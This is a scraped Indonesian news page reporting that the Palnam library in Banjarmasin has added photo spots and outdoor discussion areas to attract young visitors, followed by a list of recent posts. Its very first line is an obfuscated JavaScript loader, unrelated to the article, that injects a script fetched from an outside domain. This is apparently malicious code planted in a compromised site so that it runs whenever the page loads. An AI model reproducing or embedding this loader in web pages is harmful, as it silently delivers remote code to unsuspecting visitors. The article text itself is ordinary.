(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Lifestyle

Tak Sekadar Tempat Baca, Perpustakaan Ini Nyaman dan Instagramable


BANJARMASIN, Keberadaan perpustakaan kini tak lagi hanya sebatas tempat membaca dan menggali ilmu pengetahuan. Dinas Perpustakaan dan kearsipan (Dispersip) Provinsi Kalsel pun menyulap beberapa sudut Perpustakaan Palnam menjadi tempat foto yang menarik dan instagramable.

 Ya, gagasan ini muncul dari sang kepala dinas, dra Hj Nurliani Dardie atau yang akrab disapa Bunda Nunung. Menurut Bunda Nunung, diciptakannya spot foto yang menarik tentunya agar mampu memikat kaum milenial, tentunya juga berdampak pada meningkatnya kunjungan ke perpustakaan.

“Memang saya ciptakan untuk kaum milenial. Supaya perpustakaan jauh dari kesan kaku,” kata Bunda Nunung, Sabtu (21/12) petang.

Sehingga, dengan adanya wahana spot foto, keberadaan perpustakaan tidak hanya tempat untuk membaca saja. “Tapi bagaimana caranya agar perpustakaan sebagai tempat belajar dan beraktifitas yang menyenangkan,” tambahnya.

Bunda Nunung memaparkan, perpustakaan sekarang tidak hanya tempat di mana pengunjung serius membaca sehingga tidak boleh berisik. Tapi, justru perpustakaan itu dijadikan tempat ramai dalam artian tempat untuk pengunjung berdiskusi.

“Oke tempat serius itu memang wajib ada. Tetapi tidak harus selalu serius. Ruangan perpustakaan memang tidak boleh berisik, demi kenyamanan membaca,” katanya.

Bunda Nunung menyebut, ada beberapa tempat yang di mana pengunjung dapat berdiskusi dengan nyaman. Sehingga tidak mengganggu pembaca yang ada di dalam ruangan perpustakaan.

“Ada aula, ada gazebo dan ada taman untuk tempat baca terbuka atau outdoor serta tempat diskusi. Instagramable pula,” sebutnya.

“Biar mereka para pengunjung bisa memposting di media sosial saat ini. Jadi imbasnya promosi untuk Palnam,” pungkasnya. (fikri)

Reporter : Fikri
Editor : Bie


Desy Arfianty

Recent Posts

“Embroidery Mini Class” Perayaan Hari Kartini di Lingkungan PLN UIP3B Kalimantan

KANALKALIMANTAN.COM, BANJARBARU - Memperingati Hari Kartini 2024 PT PLN (Persero) Unit Induk Penyaluran dan Pusat… Read More

10 jam ago

Sejarah Hari Tari Sedunia 29 April

KANALKALIMANTAN.COM – Setiap tanggal 29 April diperingati salah satu seni atau ekspresi diri yang tertua… Read More

13 jam ago

Peringati Hari Tari Sedunia, Ratusan Penari Tampil di Taman Budaya Kalsel

KANALKALIMANTAN.COM, BANJARMASIN - Unit Pelaksana Teknis Daerah (UPTD) Taman Budaya Provinsi Kalimantan Selatan (Kalsel) menyelenggarakan… Read More

13 jam ago

Rakerda KNPI Banjarbaru, Rekomendasi Pendirian Gedung Pemuda

KANALKALIMANTAN.COM, BANJARBARU - Dewan Pengurus Daerah (DPD) Komite Nasional Pemuda Indonesia (KNPI) Kota Banjarbaru menggelar… Read More

15 jam ago

Peringati Hari Kartini, PLN Beri Santunan 30 Muslimah Tangguh di Banjarbaru

KANALKALIMANTAN.COM, BANJARBARU - Semangat memperingati Hari Kartini 2024, PT PLN (Persero) Unit Induk Penyaluran dan… Read More

17 jam ago

Konser Malam Pestaforia Kapuas 2024

KANALKALIMANTAN.COM, KUALA KAPUAS – “Konser Malam Pestaforia Kapuas 2024” menyemarakan Hari Jadi ke-218 Kota Kuala… Read More

18 jam ago

This website uses cookies.